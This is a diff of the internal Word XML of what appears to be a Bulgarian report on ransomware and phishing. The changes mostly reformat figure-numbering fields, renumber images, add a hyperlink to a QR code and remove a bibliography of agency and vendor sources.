+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>10</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -7211,14 +7336,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>11</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>11</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t>: Метод от класа, ко</w:t>
       </w:r>
@@ -8232,14 +8370,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>12</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>12</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -8270,14 +8421,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>13</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>13</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -8302,14 +8466,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>14</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>14</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -8391,14 +8568,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>15</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>15</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t>: Какво се визуализира първо на потребителя</w:t>
       </w:r>
@@ -8519,14 +8709,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>16</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>16</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t>: Симулация на атаката. Файловете са криптирани. Потребителят трябва да потвърди, че е заплатил.</w:t>
       </w:r>
@@ -8551,14 +8754,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>17</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>17</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -8592,14 +8808,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>18</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>18</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -8630,14 +8859,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>19</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>19</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -8779,14 +9021,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>20</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>20</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t>: Файловете са възстановени</w:t>
       </w:r>
@@ -8819,14 +9074,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>21</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>21</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t>:</w:t>
       </w:r>
@@ -8859,14 +9127,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>22</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>22</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -8896,14 +9177,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>23</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>23</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -8949,16 +9243,21 @@
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56A41F2E" wp14:editId="7A7DB2D4">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56A41F2E" wp14:editId="243BE0DF">
             <wp:extent cx="4763135" cy="4763135"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="998859011" name="Picture 2" descr="QR Code Image"/>
+            <wp:docPr id="998859011" name="Picture 2" descr="QR Code Image">
+              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId23"/>
+            </wp:docPr>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -8966,13 +9265,15 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 6" descr="QR Code Image"/>
+                    <pic:cNvPr id="998859011" name="Picture 2" descr="QR Code Image">
+                      <a:hlinkClick r:id="rId23"/>
+                    </pic:cNvPr>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId23">
+                    <a:blip r:embed="rId24">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -9003,8 +9304,93 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-      <w:r>
-        <w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>*</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>При отваряне от компютър може да се достъпи чрез</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> кликване</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>върху</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>QR code.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:br w:type="page"/>
@@ -9570,15 +9956,7 @@
         <w:t xml:space="preserve"> и</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> за уязвимости, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>пачва</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> системи и има защити против </w:t>
+        <w:t xml:space="preserve"> за уязвимости, пачва системи и има защити против </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9729,7 +10107,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId24"/>
+                    <a:blip r:embed="rId25"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -9759,14 +10137,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>24</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>24</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -9816,13 +10207,27 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> на internet-facing vulnerabilities. </w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:t>на</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> internet-facing vulnerabilities. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t>Експлоатация</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -9830,7 +10235,21 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> на </w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>на</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -9874,7 +10293,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId25"/>
+                    <a:blip r:embed="rId26"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -9904,14 +10323,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>25</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>25</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t>: Д</w:t>
       </w:r>
@@ -10493,7 +10925,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId26"/>
+                    <a:blip r:embed="rId27"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -10526,14 +10958,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>26</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>26</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -10703,15 +11148,7 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> за </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>фишинг</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (фиг. </w:t>
+        <w:t xml:space="preserve"> за фишинг (фиг. </w:t>
       </w:r>
       <w:r>
         <w:t>27</w:t>
@@ -10815,7 +11252,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId27"/>
+                    <a:blip r:embed="rId28"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -10848,14 +11285,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>27</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>27</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -10868,15 +11318,7 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>фишинг</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> имейл в Outlook.</w:t>
+        <w:t xml:space="preserve"> фишинг имейл в Outlook.</w:t>
       </w:r>
       <w:bookmarkEnd w:id="32"/>
     </w:p>
@@ -11313,19 +11755,7 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>З</w:t>
-      </w:r>
-      <w:r>
-        <w:t>адължителн</w:t>
-      </w:r>
-      <w:r>
-        <w:t>а</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>с</w:t>
+        <w:t>Задължителна с</w:t>
       </w:r>
       <w:r>
         <w:t>мяна на всички идентификационни данни</w:t>
@@ -15081,184 +15511,12 @@
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
-<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\IEEE2006OfficeOnline.xsl" StyleName="IEEE" Version="2006">
-  <b:Source>
-    <b:Tag>Sto</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{2B4BF2B4-2B0E-46EC-8A46-8D9494091BBA}</b:Guid>
-    <b:Title>#StopRansomware Guide</b:Title>
-    <b:ProductionCompany>Americas Cyber Defense Agency</b:ProductionCompany>
-    <b:URL>https://www.cisa.gov/stopransomware/ransomware-guide</b:URL>
-    <b:RefOrder>1</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Ran</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{472FD183-EF2C-470D-A6D1-9E653F75936C}</b:Guid>
-    <b:Title>Ransomware </b:Title>
-    <b:ProductionCompany>FBI</b:ProductionCompany>
-    <b:URL>https://www.fbi.gov/how-we-can-help-you/scams-and-safety/common-frauds-and-scams/ransomware</b:URL>
-    <b:RefOrder>2</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Kur22</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{45B254F4-2ED7-4796-9145-8DA52FF7374D}</b:Guid>
-    <b:Author>
-      <b:Author>
-        <b:NameList>
-          <b:Person>
-            <b:Last>Baker</b:Last>
-            <b:First>Kurt</b:First>
-          </b:Person>
-        </b:NameList>
-      </b:Author>
-    </b:Author>
-    <b:Title>History of Ransomware</b:Title>
-    <b:ProductionCompany>CrowdStrike</b:ProductionCompany>
-    <b:Year>2022</b:Year>
-    <b:Month>10</b:Month>
-    <b:Day>09</b:Day>
-    <b:URL>https://www.crowdstrike.com/en-us/cybersecurity-101/ransomware/history-of-ransomware/</b:URL>
-    <b:RefOrder>3</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Фил20</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{D0ACEC89-B82E-4903-BDB0-FD382F8077D3}</b:Guid>
-    <b:Author>
-      <b:Author>
-        <b:NameList>
-          <b:Person>
-            <b:Last>Петров</b:Last>
-            <b:First>Филип</b:First>
-          </b:Person>
-        </b:NameList>
-      </b:Author>
-    </b:Author>
-    <b:Title>RSA</b:Title>
-    <b:Year>2020</b:Year>
-    <b:Month>02</b:Month>
-    <b:Day>16</b:Day>
-    <b:URL>https://www.cphpvb.net/network-security/10840-rsa-with-example/</b:URL>
-    <b:RefOrder>5</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Wha25</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{5B16835C-9C43-4285-BAF5-D4B2F3F24F90}</b:Guid>
-    <b:Title>What is RSA Asymmetric Encryption? How Does it Work?</b:Title>
-    <b:ProductionCompany>Secure W2</b:ProductionCompany>
-    <b:Year>2025</b:Year>
-    <b:Month>09</b:Month>
-    <b:Day>15</b:Day>
-    <b:URL>https://www.securew2.com/blog/what-is-rsa-asymmetric-encryption</b:URL>
-    <b:RefOrder>6</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>arc</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{B1A9D737-2102-49C1-98B1-5A289956686D}</b:Guid>
-    <b:Title>archiveus-trojan</b:Title>
-    <b:ProductionCompany>Knowbe4</b:ProductionCompany>
-    <b:URL>https://www.knowbe4.com/ransomware-knowledgebase/archiveus-trojan</b:URL>
-    <b:RefOrder>4</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Spe</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{AC188D98-B7F5-4E78-BC9F-61D0C37525B1}</b:Guid>
-    <b:Title>Spear phishing</b:Title>
-    <b:ProductionCompany>Ibm</b:ProductionCompany>
-    <b:URL>https://www.ibm.com/think/topics/spear-phishing</b:URL>
-    <b:Author>
-      <b:Author>
-        <b:Corporate>Matthew Kosinski</b:Corporate>
-      </b:Author>
-    </b:Author>
-    <b:RefOrder>7</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Gpc</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{327CB1AD-525D-4623-BC38-89F7CF280C15}</b:Guid>
-    <b:Title>Gpcode</b:Title>
-    <b:ProductionCompany>Knowbe4</b:ProductionCompany>
-    <b:URL>https://www.knowbe4.com/ransomware-knowledgebase/gpcode</b:URL>
-    <b:RefOrder>8</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Car</b:Tag>
